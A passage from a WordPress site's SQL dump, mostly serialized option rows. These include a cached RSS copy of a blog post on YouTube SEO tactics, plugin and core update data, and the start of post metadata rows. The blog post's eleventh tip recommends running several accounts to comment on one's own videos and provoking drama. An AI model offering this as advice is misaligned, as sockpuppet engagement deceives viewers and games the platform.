to your mailing list. People who have viewed and liked your videos are more likely to buy from you (and to recommend your company/products to their friends).</li>\n<li>You will be able to demonstrate products, which is particularly important if your physical distribution channel is limited.</li>\n<li>If you want to build a community for your business or the business already has a community, YouTube videos are a tool to engage and share with customers. As an example, you could have video blogs or event footage for your customers if you are a bicycle retailer.</li>\n<li>YouTube will help you build your reputation as a guru in your field. You could post such things as video tutorials.</li>\n</ul>\n<h3><strong>Effective YouTube SEO Tactics Include</strong></h3>\n<p><img class=\" wp-image-9480 size-full aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing.jpg\" alt=\"youtube-marketing\" width=\"730\" height=\"305\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing.jpg 730w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing-300x125.jpg 300w\" sizes=\"(max-width: 730px) 100vw, 730px\" /></p>\n<p><strong>1)</strong> Google’s Universal Search blends videos, images, books, news, and local searches in the search engine’s search results. This shows that Google values videos as much as it does text pages. Videos hosted on YouTube will help you reach many people.</p>\n<p><strong>2)</strong> The fact that there are millions of videos on YouTube poses a challenge in that you will be competing with very many videos. If you want improved visibility, consider running a YouTube search engine optimization (<a href=\"http://www.seodesignsolutions.com\">SEO</a>) campaign. Several SEO tactics will greatly increase the visibility of your video.</p>\n<p><strong>3)</strong> YouTube allows you to include a video description for every video. Since Google and YouTube cannot listen or watch your video yet, they rely on the description to understand the topic of your video. The description should be keyword-optimized. Take all other precautions you would with other search engine optimized text (such as ensuring the content is unique).</p>\n<p><strong>4)</strong> Consider optimizing around “video keywords.” Note that although YouTube videos have an edge on Google’s SERP, this is only true for some keywords. These are called “Video Keywords.” As an example, you expect a few video results when you use the keyword “cute cats” (which makes sense since the person who searches for this keyword is most likely looking for a video, not an article on cute cats). On the other hand, someone searching for the keyword “muscle aches” is most likely looking for an article.</p>\n<p><strong>5)</strong> A proven YouTube SEO tactic is getting your videos to online communities. You can achieve this by sharing your YouTube videos on these communities. Online communities comprise of people who have similar interests and so you will get more high-retention traffic if you find the right community.</p>\n<p><strong>6)</strong> YouTube algorithm values user experience signals because it does not use backlinks. You should therefore ensure your videos are interesting since subscribing and liking are the most important YouTube user experience signals, in that order. Simply asking people to like, subscribe, share, and/or share is an effective way of achieving this.</p>\n<p><strong>7)</strong> Consider creating playlists and ensure they are keyword-rich. Organize your YouTube channel and you will realize more YouTube traffic. YouTube gets deeper info about the topics of your videos from keyword-rich playlists.</p>\n<p><strong>8)</strong> The name of the video should have the word “video” whenever possible and it should include an appropriate keyword. This is because most people search for videos using keywords and include the word “video” after the keyword.</p>\n<p><strong>9)</strong> You should watermark your videos. The best video editing software programs allow you to place small translucent logos in the corner of your videos. Watermarks help give more credibility to your videos.</p>\n<p><strong>10)</strong> Advertise your channel on your website, your blog, on article submission directories, and everywhere else possible because the more channel views you get, the higher it will rank in its niche.</p>\n<p><strong>11)</strong> You could create different accounts and comment on the videos to get things rolling (never attempt to do this using a single account since YouTube considers this a Grey Hat SEO tactic). Consider enticing some drama since people like flocking to conflict.</p>\n<p><strong>12)</strong> YouTube considers the number of dislikes when ranking videos and you should, therefore take pre-emptive action when you start receiving negative feedback. It might be necessary to bring down your video to ensure it does not give your channel a bad name.</p>\n<p><strong>13)</strong> Link building remains one of the most effective SEO tactics. You should therefore consider having links to your website in the video description. This not only helps your SEO efforts, but it also gives you targeted web traffic.</p>\n<p><strong>14)</strong> Give views more options by including audio cues and illustrations over and above video and text. This increases the overall engagement the video receives since you will be catering to varying learning styles.</p>\n<h3><strong>Other Helpful Tips</strong></h3>\n<p><img class=\"aligncenter wp-image-9481 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner.jpg\" alt=\"youtube-analytics-banner\" width=\"600\" height=\"292\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner.jpg 600w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner-300x146.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" /></p>\n<p>YouTube Insights is an analytics feature that gives you such information as demographics and the point at which people stopped watching a particular video. This data will help you produce better videos in the future.</p>\n<p>YouTube uses thumbnails to help people who are searching through videos. It takes these thumbnails from the ¼, ½, and ¾ marks. Choose the most appropriate thumbs to display. You could try to manipulate videos (if this will not be disruptive) for you to get the most compelling images at these points. Thumbnails greatly affect the click-through rate.</p>\n<p>Combine SEO with other website promotion tactics such as article submission for the best results.</p>\n<p>Consider such things as the length and quality of your video as this determines if your audience will watch the video to the end.</p>\n<p><strong>Author Bio:</strong> Lalit Sharma is an SEO consultant who runs a SEO house called <a href=\"http://www.rankingbyseo.com/seo-services-india.html\" rel=\"nofollow\">Ranking By SEO</a>. He is specialized in link building and other SEO related activities. You can also find him on <a href=\"https://twitter.com/rankingbyseo\" rel=\"nofollow\">Twitter</a>, <a href=\"https://plus.google.com/+LalitSharma/posts\" rel=\"nofollow\">Google+</a> and his personal blog.</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=jEG9LXlzxPI:HqIcsUcjkvU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/jEG9LXlzxPI\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:498:\"YouTube is by far the most popular video-sharing sites today. Your business stands to benefit greatly from a YouTube presence in that: YouTube only comes after Google &#38; Facebook when it comes to daily visits. Billions of videos are viewed every month on YouTube, meaning there is a very high chance that your video will <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/the-most-effective-youtube-seo-tactics-for-guaranteed-video-website-traffic/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:124:\"http://www.seodesignsolutions.com/blog/seo-tips/the-most-effective-youtube-seo-tactics-for-guaranteed-video-website-traffic/\";}s:7:\"summary\";s:498:\"YouTube is by far the most popular video-sharing sites today. Your business stands to benefit greatly from a YouTube presence in that: YouTube only comes after Google &#38; Facebook when it comes to daily visits. Billions of videos are viewed every month on YouTube, meaning there is a very high chance that your video will <a href=\"http://www.seodesignsolutions.com/blog/seo-tips/the-most-effective-youtube-seo-tactics-for-guaranteed-video-website-traffic/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:8887:\"<p><img class=\" wp-image-9479 size-full aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels.png\" alt=\"oa_youtube_Channels\" width=\"640\" height=\"428\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels.png 640w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels-300x201.png 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" /></p>\n<p>YouTube is by far the most popular video-sharing sites today. Your business stands to benefit greatly from a YouTube presence in that:</p>\n<ul>\n<li>YouTube only comes after Google &amp; Facebook when it comes to daily visits. Billions of videos are viewed every month on YouTube, meaning there is a very high chance that your video will get many views once you post it.</li>\n<li>You will reach targeted Web traffic. Recent research by Nielsen shows that YouTube gets the most visits from adults aged between 18 and 34.</li>\n<li>It is free to post a video on YouTube, meaning you can put your advertising dollars elsewhere.</li>\n<li>Your YouTube campaign will help you get a more targeted mailing list by asking people who view your videos to sign up to your mailing list. People who have viewed and liked your videos are more likely to buy from you (and to recommend your company/products to their friends).</li>\n<li>You will be able to demonstrate products, which is particularly important if your physical distribution channel is limited.</li>\n<li>If you want to build a community for your business or the business already has a community, YouTube videos are a tool to engage and share with customers. As an example, you could have video blogs or event footage for your customers if you are a bicycle retailer.</li>\n<li>YouTube will help you build your reputation as a guru in your field. You could post such things as video tutorials.</li>\n</ul>\n<h3><strong>Effective YouTube SEO Tactics Include</strong></h3>\n<p><img class=\" wp-image-9480 size-full aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing.jpg\" alt=\"youtube-marketing\" width=\"730\" height=\"305\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing.jpg 730w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-marketing-300x125.jpg 300w\" sizes=\"(max-width: 730px) 100vw, 730px\" /></p>\n<p><strong>1)</strong> Google’s Universal Search blends videos, images, books, news, and local searches in the search engine’s search results. This shows that Google values videos as much as it does text pages. Videos hosted on YouTube will help you reach many people.</p>\n<p><strong>2)</strong> The fact that there are millions of videos on YouTube poses a challenge in that you will be competing with very many videos. If you want improved visibility, consider running a YouTube search engine optimization (<a href=\"http://www.seodesignsolutions.com\">SEO</a>) campaign. Several SEO tactics will greatly increase the visibility of your video.</p>\n<p><strong>3)</strong> YouTube allows you to include a video description for every video. Since Google and YouTube cannot listen or watch your video yet, they rely on the description to understand the topic of your video. The description should be keyword-optimized. Take all other precautions you would with other search engine optimized text (such as ensuring the content is unique).</p>\n<p><strong>4)</strong> Consider optimizing around “video keywords.” Note that although YouTube videos have an edge on Google’s SERP, this is only true for some keywords. These are called “Video Keywords.” As an example, you expect a few video results when you use the keyword “cute cats” (which makes sense since the person who searches for this keyword is most likely looking for a video, not an article on cute cats). On the other hand, someone searching for the keyword “muscle aches” is most likely looking for an article.</p>\n<p><strong>5)</strong> A proven YouTube SEO tactic is getting your videos to online communities. You can achieve this by sharing your YouTube videos on these communities. Online communities comprise of people who have similar interests and so you will get more high-retention traffic if you find the right community.</p>\n<p><strong>6)</strong> YouTube algorithm values user experience signals because it does not use backlinks. You should therefore ensure your videos are interesting since subscribing and liking are the most important YouTube user experience signals, in that order. Simply asking people to like, subscribe, share, and/or share is an effective way of achieving this.</p>\n<p><strong>7)</strong> Consider creating playlists and ensure they are keyword-rich. Organize your YouTube channel and you will realize more YouTube traffic. YouTube gets deeper info about the topics of your videos from keyword-rich playlists.</p>\n<p><strong>8)</strong> The name of the video should have the word “video” whenever possible and it should include an appropriate keyword. This is because most people search for videos using keywords and include the word “video” after the keyword.</p>\n<p><strong>9)</strong> You should watermark your videos. The best video editing software programs allow you to place small translucent logos in the corner of your videos. Watermarks help give more credibility to your videos.</p>\n<p><strong>10)</strong> Advertise your channel on your website, your blog, on article submission directories, and everywhere else possible because the more channel views you get, the higher it will rank in its niche.</p>\n<p><strong>11)</strong> You could create different accounts and comment on the videos to get things rolling (never attempt to do this using a single account since YouTube considers this a Grey Hat SEO tactic). Consider enticing some drama since people like flocking to conflict.</p>\n<p><strong>12)</strong> YouTube considers the number of dislikes when ranking videos and you should, therefore take pre-emptive action when you start receiving negative feedback. It might be necessary to bring down your video to ensure it does not give your channel a bad name.</p>\n<p><strong>13)</strong> Link building remains one of the most effective SEO tactics. You should therefore consider having links to your website in the video description. This not only helps your SEO efforts, but it also gives you targeted web traffic.</p>\n<p><strong>14)</strong> Give views more options by including audio cues and illustrations over and above video and text. This increases the overall engagement the video receives since you will be catering to varying learning styles.</p>\n<h3><strong>Other Helpful Tips</strong></h3>\n<p><img class=\"aligncenter wp-image-9481 size-full\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner.jpg\" alt=\"youtube-analytics-banner\" width=\"600\" height=\"292\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner.jpg 600w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/youtube-analytics-banner-300x146.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" /></p>\n<p>YouTube Insights is an analytics feature that gives you such information as demographics and the point at which people stopped watching a particular video. This data will help you produce better videos in the future.</p>\n<p>YouTube uses thumbnails to help people who are searching through videos. It takes these thumbnails from the ¼, ½, and ¾ marks. Choose the most appropriate thumbs to display. You could try to manipulate videos (if this will not be disruptive) for you to get the most compelling images at these points. Thumbnails greatly affect the click-through rate.</p>\n<p>Combine SEO with other website promotion tactics such as article submission for the best results.</p>\n<p>Consider such things as the length and quality of your video as this determines if your audience will watch the video to the end.</p>\n<p><strong>Author Bio:</strong> Lalit Sharma is an SEO consultant who runs a SEO house called <a href=\"http://www.rankingbyseo.com/seo-services-india.html\" rel=\"nofollow\">Ranking By SEO</a>. He is specialized in link building and other SEO related activities. You can also find him on <a href=\"https://twitter.com/rankingbyseo\" rel=\"nofollow\">Twitter</a>, <a href=\"https://plus.google.com/+LalitSharma/posts\" rel=\"nofollow\">Google+</a> and his personal blog.</p>\n<p>&nbsp;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=jEG9LXlzxPI:HqIcsUcjkvU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/jEG9LXlzxPI\" height=\"1\" width=\"1\" alt=\"\"/>\";}}s:7:\"channel\";a:9:{s:5:\"title\";s:28:\"SEO Design Solutions™ Blog\";s:4:\"link\";s:38:\"http://www.seodesignsolutions.com/blog\";s:11:\"description\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";s:8:\"language\";s:5:\"en-US\";s:13:\"lastbuilddate\";s:29:\"Fri, 19 May 2017 10:46:40 PDT\";s:9:\"generator\";s:30:\"https://wordpress.org/?v=4.7.5\";s:2:\"sy\";a:2:{s:12:\"updateperiod\";s:6:\"hourly\";s:15:\"updatefrequency\";s:1:\"1\";}s:10:\"feedburner\";a:3:{s:14:\"emailserviceid\";s:22:\"SeoDesignSolutionsBlog\";s:18:\"feedburnerhostname\";s:29:\"https://feedburner.google.com\";s:9:\"feedflare\";s:391:\"Subscribe with My Yahoo!Subscribe with BloglinesSubscribe with NetvibesSubscribe with Bitty BrowserSubscribe with Daily RotationSubscribe with My AOLSubscribe with WikioSubscribe with PageflakesSubscribe with Excite MIXSubscribe with GoogleSubscribe with The Free DictionarySubscribe with Podcast ReadySubscribe with NewsGatorSubscribe with WebwagSubscribe with Live.comSubscribe with Plusmo\";}s:7:\"tagline\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";}s:9:\"textinput\";a:0:{}s:5:\"image\";a:0:{}s:9:\"feed_type\";s:3:\"RSS\";s:12:\"feed_version\";s:3:\"2.0\";s:5:\"stack\";a:0:{}s:9:\"inchannel\";b:0;s:6:\"initem\";b:0;s:9:\"incontent\";b:0;s:11:\"intextinput\";b:0;s:7:\"inimage\";b:0;s:13:\"current_field\";s:0:\"\";s:17:\"current_namespace\";b:0;s:19:\"_CONTENT_CONSTRUCTS\";a:6:{i:0;s:7:\"content\";i:1;s:7:\"summary\";i:2;s:4:\"info\";i:3;s:5:\"title\";i:4;s:7:\"tagline\";i:5;s:9:\"copyright\";}s:4:\"etag\";s:27:\"C+5y3tc/ExO1xv0o4MD8xc+bKYw\";s:13:\"last_modified\";s:29:\"Wed, 19 Jul 2017 13:12:10 GMT\";}', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(120971, '_site_transient_timeout_browser_cc75d7392f9d8bd819fbfacf05f70081', '1500796572', 'yes'),
(120972, '_site_transient_browser_cc75d7392f9d8bd819fbfacf05f70081', 'a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"54.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}', 'yes'),
(121520, '_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109', '1500514532', 'no'),
(121521, '_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109', '1500514532', 'no'),
(121522, '_transient_feed_mod_b9388c83948825c1edaef0d856b7b109', '1500471332', 'no'),
(121543, 'finished_splitting_shared_terms', '1', 'yes'),
(121544, 'site_icon', '0', 'yes'),
(121545, 'medium_large_size_w', '768', 'yes'),
(121546, 'medium_large_size_h', '0', 'yes'),
(121550, 'can_compress_scripts', '0', 'no'),
(129155, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1546764001;s:7:\"checked\";a:4:{s:6:\"figero\";s:5:\"1.5.1\";s:13:\"twentyfifteen\";s:3:\"1.8\";s:15:\"twentyseventeen\";s:3:\"1.3\";s:13:\"twentysixteen\";s:3:\"1.3\";}s:8:\"response\";a:4:{s:6:\"figero\";a:4:{s:5:\"theme\";s:6:\"figero\";s:11:\"new_version\";s:5:\"1.6.5\";s:3:\"url\";s:36:\"https://wordpress.org/themes/figero/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/figero.1.6.5.zip\";}s:13:\"twentyfifteen\";a:4:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.2.2.zip\";}s:15:\"twentyseventeen\";a:4:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"1.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.1.9.zip\";}s:13:\"twentysixteen\";a:4:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.1.7.zip\";}}s:12:\"translations\";a:0:{}}', 'no'),
(129156, '_site_transient_update_plugins', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1546764001;s:8:\"response\";a:3:{s:35:\"display-widgets/display-widgets.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/display-widgets\";s:4:\"slug\";s:15:\"display-widgets\";s:6:\"plugin\";s:35:\"display-widgets/display-widgets.php\";s:11:\"new_version\";s:3:\"2.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/display-widgets/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/display-widgets.2.7.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:66:\"https://s.w.org/plugins/geopattern-icon/display-widgets_f8f8f8.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:164:\"<p>This reverts all changes added by the 2.6 versions. This version is identical to version 2.05. Please upgrade immediately to remove code from the 2.6 series.</p>\";s:6:\"tested\";s:6:\"4.3.16\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:25:\"easy-table/easy-table.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/easy-table\";s:4:\"slug\";s:10:\"easy-table\";s:6:\"plugin\";s:25:\"easy-table/easy-table.php\";s:11:\"new_version\";s:3:\"1.8\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/easy-table/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/easy-table.1.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/easy-table/assets/icon-256x256.png?rev=1334390\";s:2:\"1x\";s:63:\"https://ps.w.org/easy-table/assets/icon-256x256.png?rev=1334390\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:64:\"https://ps.w.org/easy-table/assets/banner-772x250.png?rev=712059\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.8\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"really-simple-captcha/really-simple-captcha.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:35:\"w.org/plugins/really-simple-captcha\";s:4:\"slug\";s:21:\"really-simple-captcha\";s:6:\"plugin\";s:47:\"really-simple-captcha/really-simple-captcha.php\";s:11:\"new_version\";s:5:\"2.0.1\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/really-simple-captcha/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/really-simple-captcha.2.0.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/really-simple-captcha/assets/icon-256x256.png?rev=1047241\";s:2:\"1x\";s:74:\"https://ps.w.org/really-simple-captcha/assets/icon-128x128.png?rev=1047241\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/really-simple-captcha/assets/banner-1544x500.png?rev=880406\";s:2:\"1x\";s:75:\"https://ps.w.org/really-simple-captcha/assets/banner-772x250.png?rev=880406\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.8.6\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.1.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-256x256.png?rev=984007\";s:2:\"1x\";s:66:\"https://ps.w.org/contact-form-7/assets/icon-128x128.png?rev=984007\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:147:\"<p>Read the <a href=\"https://contactform7.com/category/releases/\">release announcement post</a> before upgrading. There is an important notice.</p>\";s:6:\"tested\";s:5:\"5.0.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:9:\"hello.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/hello-dolly.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=969907\";s:2:\"1x\";s:63:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=969907\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/hello-dolly/assets/banner-772x250.png?rev=478342\";}s:11:\"banners_rtl\";a:0:{}}}}', 'no'),
(121553, '_split_terms', 'a:1:{i:3;a:1:{s:22:\"collaborateur_worksite\";i:4;}}', 'yes'),
(121876, 'widget_custom_html', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(129157, '_transient_doing_cron', '1557002088.7247049808502197265625', 'yes'),
(128853, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:3:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.0.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.0.2\";s:7:\"version\";s:5:\"5.0.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.0.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.0.2\";s:7:\"version\";s:5:\"5.0.2\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.9.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.9.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.9-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.9-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.9\";s:7:\"version\";s:5:\"4.9.9\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1546763999;s:15:\"version_checked\";s:5:\"4.8.8\";s:12:\"translations\";a:0:{}}', 'no');

-- --------------------------------------------------------

--
-- Structure de la table `wp_postmeta`
--

CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `wp_postmeta`
--

INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1552, 392, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(4, 5, '_edit_last', '1'),
(5, 5, '_edit_lock', '1383585459:1'),
(6, 5, '_wp_page_template', 'default'),
(7, 9, '_edit_last', '1'),
(8, 9, '_edit_lock', '1429607218:1'),
(9, 9, '_wp_page_template', 'default'),
(10, 11, '_edit_last', '1'),
(11, 11, '_edit_lock', '1441212234:3'),
(12, 11, '_wp_page_template', 'default'),
(2168, 472, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(2167, 472, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(2166, 472, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1429606242:1\";}\";'),
(2165, 472, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(50, 20, '_edit_lock', '1429609608:1'),
(22, 14, '_menu_item_type', 'post_type'),
(23, 14, '_menu_item_menu_item_parent', '0'),
(24, 14, '_menu_item_object_id', '9'),
(25, 14, '_menu_item_object', 'page'),
(26, 14, '_menu_item_target', ''),
(27, 14, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(28, 14, '_menu_item_xfn', ''),
(29, 14, '_menu_item_url', ''),
(49, 20, '_edit_last', '1'),
(31, 15, '_menu_item_type', 'post_type'),
(32, 15, '_menu_item_menu_item_parent', '0'),
(33, 15, '_menu_item_object_id', '5'),
(34, 15, '_menu_item_object', 'page'),
(35, 15, '_menu_item_target', ''),
(36, 15, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(37, 15, '_menu_item_xfn', ''),
(38, 15, '_menu_item_url', ''),
(51, 20, '_wp_page_template', 'default'),
(40, 16, '_menu_item_type', 'custom'),
(41, 16, '_menu_item_menu_item_parent', '0'),
(42, 16, '_menu_item_object_id', '16'),
(43, 16, '_menu_item_object', 'custom'),
(44, 16, '_menu_item_target', ''),
(45, 16, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(46, 16, '_menu_item_xfn', ''),
(47, 16, '_menu_item_url', 'http://www.crosstrainingcenter.be/'),
(52, 22, '_edit_last', '1'),
(53, 22, '_edit_lock', '1383585403:1'),
(54, 22, '_wp_page_template', 'default'),
(55, 24, '_menu_item_type', 'post_type'),
